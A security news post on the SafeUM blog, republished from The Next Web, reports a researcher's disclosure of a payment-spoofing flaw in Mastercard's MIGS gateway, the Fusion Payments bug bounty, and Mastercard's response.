SafeUM
Home Blog Services Download Help About Recharge

Axarhöfði 14, 110 Reykjavik, Iceland

Iceland - 2015
SafeUM
Blog
Services
Download
Help
About
Recharge
Menu
Archive
TOP Security!
7 Sep 2017

Mastercard is ignoring a critical flaw that allows hackers to spoof valid payments

Vendors relying on Mastercard’s Internet Gateway Service (MIGS) for processing online payments ought to double-check every transaction before they send out items to customers. 

There is a critical flaw in the system’s validation protocol and it appears the company is completely ignoring it.

Independent security researcher Yohanes Nugroho has stumbled upon a glaring flaw in the MIGS protocol that allows hackers to spoof the payment system and trick merchants into accepting invalid transactions as successful – without even knowing. “It can be said that this is a MIGS client bug, but the hashing method chosen by Mastercard allows this to happen,” the researcher explains. “Had the value been encoded, this bug will not be possible.” According to Nugroho’s findings, crafty attackers can exploit this shortcoming to inject invalid values in third-party intermediate payment services to bypass Mastercard’s system altogether and relay the request straight to vendors.

As the researcher observed, “instead of validating inputs on the merchants server side before sending it to MIGS,” the requests are only checked on the client side. Since this data never reaches Mastercard’s servers, it remains susceptible to spoofing.

This means that, if successful, hackers would be able to pass on invalid payment transactions as absolutely legitimate proof of payment. While merchants will still have to confirm the transaction, most users rarely ever check their bank accounts before approving the requests – which is exactly why this loophole is so worrisome.

Nugroho has been able to confirm that at least one payment gateway – Fusion Payments, a company valued at $20 million – was susceptible to this attack. Fusion Payments has since rewarded the researcher with a $500 bug bounty. They have also already implemented a filtering measure to prevent attackers from exploiting this hole.

This is what Nugroho said about Fusion’s implementation of MIGS:

Initially, they (Fusion) didn’t even check the signature from MIGS. That means we can just alter the data returned by MIGS and mark the transaction as successful. This just means changing a single character from F (false) to 0 (success[ful]).
So basically we can just enter any credit card number, got a failed response from MIGS, change it, and suddenly payment is successful. After they fixed the bug, I discovered that they are vulnerable to the Mastercard hashing bug.

Redditors claim that hackers are already exploiting the vulnerability in India, where MIGS is relatively wide-used, but we haven’t been able to confirm this is indeed the case.

What is particularly worrying though is that the vulnerability can be exploited on practically any system reliant on MIGS, not just Fusion Payments. Still, Mastercard continues to ignore Nugroho’s warnings.

The researcher, who has previously reported and been rewarded $8,500 for finding a similar bug in the MIGS system, told  he reported the bug to Mastercard on August 17, but its representatives are yet to acknowledge the flaw. That is despite the fact that his password-protected disclosure post has been accessed by company employees at least three times so far.

In addition to his bug report, he also emailed some of the Mastercard security officers that processed his previous disclosure. He never heard back from them either. We have contacted Mastercard for more details and will update this post accordingly should we hear back.

Meanwhile, vendors, better stay on your toes – some seemingly valid payment requests might not be all that legitimate after all. Mastercard’s Senior Vice President of External Communications, Seth Eisen, had this to say:

We are aware of and have looked into the claims made by this researcher. While this specific claim has does not exist within our system, we have identified a potential for a misconfiguration on merchants’ sites that could potentially affect how data is delivered. We are providing specific training and resources to the small number of merchants who could be impacted to minimize any exploitation of such an action.

Download SafeUM — communicate privately, without advertising and spam.

Tags:
Mastercard information leaks fraud hackers
Source:
The Next Web
1682
Other NEWS
3 Jul 2020 safeum news imgage An encrypted messaging service has been infiltrated by police
4 May 2020 safeum news imgage Two-Factor Authentication ​What Is It and Why You Should Use It
12 Dec 2019 safeum news imgage Encryption is under threat - this is how it affects you
4 Nov 2019 safeum news imgage Should Big Decisions Be Based on Data or Your Intuition?
7 Jun 2018 safeum news imgage VPNFilter malware infecting 500,000 devices is worse than we thought
4 Jun 2018 safeum news imgage Hackers target Booking.com in criminal bid to steal hundreds of thousands from customers
1 Jun 2018 safeum news imgage Operator of World's Top Internet Hub Sues German Spy Agency
30 May 2018 safeum news imgage US says North Korea behind malware attacks
29 May 2018 safeum news imgage Facebook and Google targeted as first GDPR complaints filed
25 May 2018 safeum news imgage A new reason to not buy these cheap Android devices
24 May 2018 safeum news imgage Flaws in smart pet devices, apps could come back to bite owners
23 May 2018 safeum news imgage Google sued for 'clandestine tracking' of 4.4m UK iPhone users' browsing data
21 May 2018 safeum news imgage LocationSmart reportedly leaked phone location data onto the web
18 May 2018 safeum news imgage The SEC created its own scammy ICO to teach investors a lesson
17 May 2018 safeum news imgage Thieves suck millions out of Mexican banks in transfer heist
All news
SafeUM
Confidential Terms of Use Our technologies Company
Follow us
Download
SafeUM © Safe Universal Messenger

Axarhöfði 14,
110 Reykjavik, Iceland

Iceland - 2015